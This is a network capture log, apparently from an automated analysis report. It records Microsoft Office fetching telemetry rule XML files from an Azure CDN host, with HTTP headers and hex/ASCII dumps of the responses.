TimestampBytes transferredDirectionData
2024-10-30 02:46:48 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:48 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:48 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
ETag: "0x8DC582BE39DFC9B"
x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024648Z-16849878b786lft2mu9uftf3y400000008n000000000kmqn
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:48 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


Session IDSource IPSource PortDestination IPDestination Port
86192.168.2.44984213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:48 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:48 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:48 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE017CAD3"
x-ms-request-id: cd04a713-f01e-003f-7315-26d19d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024648Z-16849878b78hh85qc40uyr8sc800000007q000000000ebfc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:48 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


Session IDSource IPSource PortDestination IPDestination Port
87192.168.2.44984313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:48 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:48 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:48 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
ETag: "0x8DC582BE6431446"
x-ms-request-id: 44be6224-701e-0032-738d-27a540000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024648Z-r197bdfb6b4xfp4mncra29rqkc00000000tg00000000e9ym
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:48 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
88192.168.2.44984113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:48 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:48 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:48 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF66E42D"
x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024648Z-16849878b78sx229w7g7at4nkg00000005sg000000001adm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:48 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
89192.168.2.44984413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:48 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:48 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:48 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE12A98D"
x-ms-request-id: eb17c832-b01e-0097-1249-274f33000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024648Z-16849878b78p8hrf1se7fucxk800000008cg0000000010df
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:48 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


Session IDSource IPSource PortDestination IPDestination Port
90192.168.2.44984513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:49 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:49 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:49 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE022ECC5"
x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024649Z-15b8d89586fqj7k5h9gbd8vs9800000008r0000000000byu
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:49 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
91192.168.2.44984613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:49 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:49 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:49 GMT
Content-Type: text/xml
Content-Length: 1389
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE10A6BC1"
x-ms-request-id: 9bc6d014-801e-008f-4946-262c5d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024649Z-r197bdfb6b4skzzvqpzzd3xetg00000006yg0000000016aq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:49 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


Session IDSource IPSource PortDestination IPDestination Port
92192.168.2.44984813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:49 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:49 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:49 GMT
Content-Type: text/xml
Content-Length: 1405
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE12B5C71"
x-ms-request-id: 2e8006eb-901e-0083-471c-26bb55000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024649Z-16849878b78qf2gleqhwczd21s00000007r00000000015ka
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:49 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session IDSource IPSource PortDestination IPDestination Port
93192.168.2.44984713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:49 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:49 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:49 GMT
Content-Type: text/xml
Content-Length: 1352
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
ETag: "0x8DC582BE9DEEE28"
x-ms-request-id: 258e3987-401e-0047-4dfa-288597000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024649Z-17c5cb586f66g7mvgrudxte95400000002a000000000ehye
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:49 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


Session IDSource IPSource PortDestination IPDestination Port
94192.168.2.44984913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:49 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:49 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:49 GMT
Content-Type: text/xml
Content-Length: 1368
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDDC22447"
x-ms-request-id: 207ff7bf-701e-006f-1357-27afc4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024649Z-16849878b785jrf8dn0d2rczaw00000008eg00000000vsee
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:49 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


Session IDSource IPSource PortDestination IPDestination Port
95192.168.2.44985013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:50 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:50 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:50 GMT
Content-Type: text/xml
Content-Length: 1401
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE055B528"
x-ms-request-id: 04bfc9b2-001e-0017-54ad-260c3c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024650Z-16849878b78wv88bk51myq5vxc00000007n000000000nscy
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:50 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


Session IDSource IPSource PortDestination IPDestination Port
96192.168.2.44985113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:50 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:50 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:50 GMT
Content-Type: text/xml
Content-Length: 1364
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE1223606"
x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024650Z-16849878b78p8hrf1se7fucxk8000000089g00000000c74g
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
